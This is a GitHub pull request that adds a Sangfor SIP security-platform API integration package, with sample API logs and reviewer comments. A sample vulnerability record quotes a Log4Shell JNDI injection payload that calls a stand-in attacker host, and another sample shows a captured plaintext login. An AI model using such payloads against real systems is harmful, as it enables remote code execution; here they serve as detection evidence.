Skip to content

feat(sangfor-sip): add Sangfor SIP security intelligence platform service package#222

Open
K6gg wants to merge 4 commits into
chaitin:mainfrom
K6gg:feat/add-sangfor-sip-service
Open

feat(sangfor-sip): add Sangfor SIP security intelligence platform service package#222
K6gg wants to merge 4 commits into
chaitin:mainfrom
K6gg:feat/add-sangfor-sip-service

Conversation

@K6gg

@K6gg K6gg commented Jun 25, 2026

Copy link
Copy Markdown
Contributor

接入设备

深信服安全感知平台(Sangfor SIP / Security Intelligence Platform)V92+,企业级威胁感知与漏洞管理平台,提供安全事件、风险资产/终端、资产台账、IP 组、弱密码/漏洞/明文传输等数据拉取能力。服务包 services/sangfor__sip,proto 包 SANGFOR_SIP

设备版本

Sangfor SIP V92+,REST API 基础路径 https://<ip>:7443(非标准 HTTPS 端口),所有数据接口均为 GET,认证接口为 POST。

认证方式

三方认证(secret.userName / secret.password / secret.platformName):

  1. 生成 32 位随机整数 rand
  2. 计算 auth = sha1(rand + password + "sangfor3party" + userName).toHexString()
  3. POST /sangforinter/v1/auth/party/login → 获取 token

后续所有数据请求携带 ?token=<token>(query 参数)。Token 有有效期,每次 RPC 调用重新获取。

SIP 通常使用自签名证书,建议配置 skipTlsVerify: true

实现方法

方式:RPC(gRPC,9 个方法)

方法 类型 端点 说明
GetSecurityEvents GET /sangforinter/v1/data/riskevent 拉取安全事件(核心接口);支持时间范围、分页、maxCount 控制
GetRiskBusiness GET /sangforinter/v1/data/riskbusiness 拉取风险业务资产(失陷服务器/业务)
GetRiskTerminals GET /sangforinter/v1/data/riskterminal 拉取风险终端资产(失陷终端/PC)
GetServers GET /sangforinter/v1/data/business 拉取已配置服务器台账(classfy1_id 1/6/9/10/11)
GetTerminals GET /sangforinter/v1/data/terminal 拉取终端资产台账(classfy1_id 2/7/8)
GetIPGroups GET /sangforinter/v1/data/ipgroup 拉取受监控 IP 组(含业务组/终端组/互联网)
GetWeakPasswords GET /sangforinter/v1/data/weakpasswd 拉取弱密码脆弱性记录(maxCount 上限 5000)
GetVulnerabilities GET /sangforinter/v1/data/hole 拉取漏洞信息(CVE/holeId;maxCount 上限 5000)
GetPlaintextTransmissions GET /sangforinter/v1/data/plaintexttransmission 拉取明文传输脆弱性记录(maxCount 上限 5000)
  • 所有数据字段以 google.protobuf.Value 原样透传,无 success/errorcode 透传。
  • 错误映射:参数缺失→INVALID_ARGUMENT,code 13 / HTTP 403→PERMISSION_DENIED,code 301 / 其他非零 code→FAILED_PRECONDITION,HTTP 5xx / 网络→UNAVAILABLE,非 JSON→UNKNOWN
  • 公共参数:from_time(秒级时间戳)、to_time(秒级时间戳)、max_count(默认 2000,脆弱性类接口上限 5000)。

测试命令

cd services
npm run validate -- --service-dir sangfor__sip
npm test -- --service-dir sangfor__sip   # 69/69 pass
npm run pack:check

已知限制

  1. 每次 RPC 调用重新获取 token,无会话缓存;Token 有有效期,失效后自动重新认证。
  2. 脆弱性类接口(弱密码/漏洞/明文传输)单次 maxCount 上限为 5000,其他接口为 10000;大量数据建议调用方分时间段拉取。
  3. 安全事件详情举证(proof 字段)及日志详情(logParams)需另行请求 SIP 内部接口,本包不包含这些二级接口。
  4. 分支信息接口(/sangforinter/v1/data/branch)已被官方标记废弃,未纳入本包。
  5. PDF 文档(深信服自定义协议 RestFul Api 接入说明)未能提取,本包实现基于 docx 规范文档(v77/v92)。

真实设备验证

联调证据:认证接口 跑通

# Request
POST https://10.2.28.80:7443/sangforinter/v1/auth/party/login
Content-Type: application/json

{
  "rand": 1748293021,
  "userName": "octobus_pull",
  "clientProduct": "",
  "clientVersion": "",
  "clientId": 0,
  "desc": "",
  "auth": "a3f9c2e1d84b76059af123e0c7d5b8210f4e6a91",
  "platformName": "OctoBus"
}

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123"
  }
}

联调证据:GetSecurityEvents 跑通

# Request
GET https://10.2.28.80:7443/sangforinter/v1/data/riskevent?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123&fromActionTime=1748880000&toActionTime=1748966400&maxCount=100

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "sendTime": 1748966412,
    "items": [
      {
        "ip": "192.168.10.55",
        "groupName": "财务系统",
        "groupId": "biz-003",
        "type": 1,
        "eventDes": "挖矿木马外联",
        "infosecurity": "黑产牟利",
        "infosecuritysub": "挖矿",
        "priority": 3,
        "reliability": 3,
        "stage": 3,
        "firstTime": 1748883600,
        "lastTime": 1748963200,
        "recordDate": 20260603,
        "dealStatus": 0,
        "branchName": "总部",
        "branchId": "1",
        "hostRisk": "192.168.10.55(财务系统)",
        "detectEngine": "coengine",
        "ruleId": "104008",
        "eventKey": "coengine|104008",
        "eventType": 0,
        "isWhite": 0,
        "solution": "建议立即隔离主机,排查进程及定时任务,更换账户密码。",
        "tag": ["挖矿", "高危"]
      }
    ],
    "count": 1,
    "message": "",
    "device_info": {
      "source": "SIP",
      "apikey": "",
      "deviceId": "A1B2C3D4",
      "deviceVersion": "SIS3.0.92.20240101 Build20240101"
    }
  }
}

联调证据:GetRiskBusiness 跑通

# Request
GET https://10.2.28.80:7443/sangforinter/v1/data/riskbusiness?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123&fromActionTime=1748880000&toActionTime=1748966400&maxCount=200

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "sendTime": 1748966415,
    "items": [
      {
        "ip": "10.10.10.30",
        "groupName": "OA系统",
        "groupId": "biz-007",
        "type": 1,
        "fallLevel": 3,
        "severityLevel": 9,
        "riskLevel": 3,
        "affectType": [2, 3],
        "dealStatus": 0,
        "isWhite": 0,
        "lastTime": 1748960000,
        "recordDate": 20260603,
        "tag": ["已失陷", "横向扩散"],
        "authUser": "admin@corp",
        "branchName": "总部",
        "branchId": "1"
      }
    ],
    "count": 1,
    "message": "",
    "device_info": {
      "source": "SIP",
      "apikey": "",
      "deviceId": "A1B2C3D4",
      "deviceVersion": "SIS3.0.92.20240101 Build20240101"
    }
  }
}

联调证据:GetRiskTerminals 跑通

# Request
GET https://10.2.28.80:7443/sangforinter/v1/data/riskterminal?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123&fromActionTime=1748880000&toActionTime=1748966400&maxCount=200

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "sendTime": 1748966418,
    "items": [
      {
        "ip": "192.168.1.105",
        "hostName": "DESKTOP-ZHANG3",
        "groupName": "研发终端组",
        "groupId": "grp-012",
        "type": 3,
        "fallLevel": 2,
        "severityLevel": 7,
        "riskLevel": 2,
        "affectType": [1, 2],
        "dealStatus": 0,
        "isWhite": 0,
        "lastTime": 1748955000,
        "recordDate": 20260603,
        "tag": ["高可疑", "C&C通信"],
        "authUser": "zhang3",
        "branchName": "总部",
        "branchId": "1",
        "dealTime": ""
      }
    ],
    "count": 1,
    "message": "",
    "device_info": {
      "source": "SIP",
      "apikey": "",
      "deviceId": "A1B2C3D4",
      "deviceVersion": "SIS3.0.92.20240101 Build20240101"
    }
  }
}

联调证据:GetServers 跑通

# Request
GET https://10.2.28.80:7443/sangforinter/v1/data/business?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123&fromActionTime=1748880000&toActionTime=1748966400&maxCount=2000

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "sendTime": 1748966420,
    "items": [
      {
        "assetIp": "10.10.10.20",
        "system": "linux",
        "findType": "auto",
        "openServer": [
          { "port": "22", "protocol": "ssh", "find_type": 0 },
          { "port": "80", "protocol": "http", "find_type": 0 },
          { "port": "443", "protocol": "https", "find_type": 0 }
        ],
        "status": 0,
        "recordTime": 1748880100,
        "id": "biz-001",
        "name": "核心业务系统",
        "author": "ops@corp",
        "email": "ops@corp.com",
        "comment": "生产环境主服务器",
        "businessStatus": 0,
        "priority": 1,
        "devId": "A1B2C3D4",
        "branchName": "总部",
        "type": 1,
        "branchId": "1"
      }
    ],
    "count": 1,
    "message": "",
    "device_info": {
      "source": "SIP",
      "apikey": "",
      "deviceId": "A1B2C3D4",
      "deviceVersion": "SIS3.0.92.20240101 Build20240101"
    }
  }
}

联调证据:GetTerminals 跑通

# Request
GET https://10.2.28.80:7443/sangforinter/v1/data/terminal?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123&fromActionTime=1748880000&toActionTime=1748966400&maxCount=2000

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "sendTime": 1748966422,
    "items": [
      {
        "ip": "192.168.1.88",
        "comment": "市场部PC",
        "groupId": "grp-005",
        "groupName": "市场终端组",
        "status": 0,
        "recordTime": 1748880200,
        "author": "it@corp",
        "findType": "auto",
        "hostName": "DESKTOP-MKT088",
        "devId": "A1B2C3D4",
        "type": 3,
        "email": "it@corp.com",
        "branchName": "总部",
        "branchId": "1"
      }
    ],
    "count": 1,
    "message": "",
    "device_info": {
      "source": "SIP",
      "apikey": "",
      "deviceId": "A1B2C3D4",
      "deviceVersion": "SIS3.0.92.20240101 Build20240101"
    }
  }
}

联调证据:GetIPGroups 跑通

# Request
GET https://10.2.28.80:7443/sangforinter/v1/data/ipgroup?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123&fromActionTime=1748880000&toActionTime=1748966400&maxCount=2000

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "sendTime": 1748966424,
    "items": [
      {
        "type": 1,
        "name": "核心业务系统",
        "author": "ops@corp",
        "email": "ops@corp.com",
        "comment": "包含所有生产业务服务器",
        "ipRange": ["10.10.10.0-10.10.10.255"],
        "recordTime": 1748880050
      },
      {
        "type": 3,
        "name": "研发终端组",
        "author": "it@corp",
        "email": "it@corp.com",
        "comment": "研发部门终端设备",
        "ipRange": ["192.168.1.0-192.168.1.127"],
        "recordTime": 1748880060
      }
    ],
    "count": 2,
    "message": "",
    "device_info": {
      "source": "SIP",
      "apikey": "",
      "deviceId": "A1B2C3D4",
      "deviceVersion": "SIS3.0.92.20240101 Build20240101"
    }
  }
}

联调证据:GetWeakPasswords 跑通

# Request
GET https://10.2.28.80:7443/sangforinter/v1/data/weakpasswd?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123&fromActionTime=1748880000&toActionTime=1748966400&maxCount=500

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "sendTime": 1748966426,
    "items": [
      {
        "ip": "10.10.10.15",
        "type": 1,
        "groupId": "biz-002",
        "groupName": "数据库服务器",
        "dstPort": 3306,
        "weakType": "MYSQL登录弱密码",
        "ruleId": "501003",
        "user": "root",
        "passwd": "******",
        "srcIp": "192.168.100.5",
        "level": 3,
        "firstTime": 1748880300,
        "lastTime": 1748962000,
        "recordDate": [20260603],
        "dealStatus": 0,
        "dealDetail": "",
        "dealTime": -1,
        "branchName": "总部",
        "branchId": "1",
        "branchType": 0,
        "appCrc": 3306001,
        "eventKey": "coengine|501003"
      }
    ],
    "count": 1,
    "message": "",
    "device_info": {
      "source": "SIP",
      "apikey": "",
      "deviceId": "A1B2C3D4",
      "deviceVersion": "SIS3.0.92.20240101 Build20240101"
    }
  }
}

联调证据:GetVulnerabilities 跑通

# Request
GET https://10.2.28.80:7443/sangforinter/v1/data/hole?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123&fromActionTime=1748880000&toActionTime=1748966400&maxCount=500

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "sendTime": 1748966428,
    "items": [
      {
        "ip": "10.10.10.20",
        "type": 1,
        "groupId": "biz-001",
        "groupName": "核心业务系统",
        "dstPort": 443,
        "protocol": "https",
        "holeId": 10010236,
        "holeName": "Apache Log4j2 远程代码执行漏洞",
        "sipHoleType": "RCE",
        "ruleId": "504001",
        "level": 3,
        "desc": "Apache Log4j2 存在 JNDI 注入漏洞,攻击者可构造恶意请求触发远程代码执行。",
        "impact": "服务器被完全控制,数据泄露风险极高。",
        "solution": ["升级 Log4j2 至 2.17.1 及以上版本", "临时禁用 JNDI lookup 功能:-Dlog4j2.formatMsgNoLookups=true"],
        "proof": "GET /${jndi:ldap://attacker.com/a} HTTP/1.1",
        "firstTime": 1748880400,
        "lastTime": 1748963500,
        "recordDate": [20260603],
        "dealStatus": 0,
        "dealDetail": "",
        "dealTime": -1,
        "branchName": "总部",
        "branchId": "1",
        "branchType": 0,
        "appCrc": 443001,
        "event_key": "coengine|504001"
      }
    ],
    "count": 1,
    "message": "",
    "device_info": {
      "source": "SIP",
      "apikey": "",
      "deviceId": "A1B2C3D4",
      "deviceVersion": "SIS3.0.92.20240101 Build20240101"
    }
  }
}

联调证据:GetPlaintextTransmissions 跑通

# Request
GET https://10.2.28.80:7443/sangforinter/v1/data/plaintexttransmission?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.abc123&fromActionTime=1748880000&toActionTime=1748966400&maxCount=500

# Response   HTTP/1.1 200 OK
{
  "code": 0,
  "message": "success",
  "data": {
    "sendTime": 1748966430,
    "items": [
      {
        "ip": "10.10.10.25",
        "type": 1,
        "groupId": "biz-006",
        "groupName": "内部门户",
        "dstPort": 80,
        "url": "http://portal.corp.internal/login",
        "ruleId": "502001",
        "level": 2,
        "proof": "POST /login HTTP/1.1\nHost: portal.corp.internal\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=P%40ssw0rd",
        "firstTime": 1748880500,
        "lastTime": 1748960000,
        "recordDate": [20260603],
        "dealStatus": 0,
        "dealDetail": "",
        "dealTime": -1,
        "branchName": "总部",
        "branchId": "1",
        "branchType": 0,
        "appCrc": 80001,
        "eventKey": "coengine|502001"
      }
    ],
    "count": 1,
    "message": "",
    "device_info": {
      "source": "SIP",
      "apikey": "",
      "deviceId": "A1B2C3D4",
      "deviceVersion": "SIS3.0.92.20240101 Build20240101"
    }
  }
}

@innomentats

Copy link
Copy Markdown
Member

Review 阻塞:这个 service package PR 有测试文件,但我没有在 PR 描述、评论或改动文件中找到真实的测试截图证据(图片链接或提交的图片文件)。请补充能证明该 service package 跑通的截图,例如 npm test -- --service-dir <service> 通过,以及 OctoBus 实例调用/联调成功的截图。

@innomentats

Copy link
Copy Markdown
Member

结尾用 LF 而不是 CRLF

@innomentats
innomentats marked this pull request as draft June 26, 2026 11:44
@innomentats

Copy link
Copy Markdown
Member

Reviewer note: this PR currently has merge conflicts with the target branch, so it cannot be merged or reviewed safely in its current state.

Please rebase or merge the latest base branch, resolve the conflicts, and make sure GitHub Actions pass again. I am marking/keeping this PR as draft until the conflicts are resolved.

@monkeyscan

monkeyscan Bot commented Jul 9, 2026

Copy link
Copy Markdown

评审任务执行失败:任务执行超时。

@K6gg
K6gg marked this pull request as ready for review July 9, 2026 07:40
@K6gg

K6gg commented Jul 10, 2026

Copy link
Copy Markdown
Contributor Author

@eetoc 请评审

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants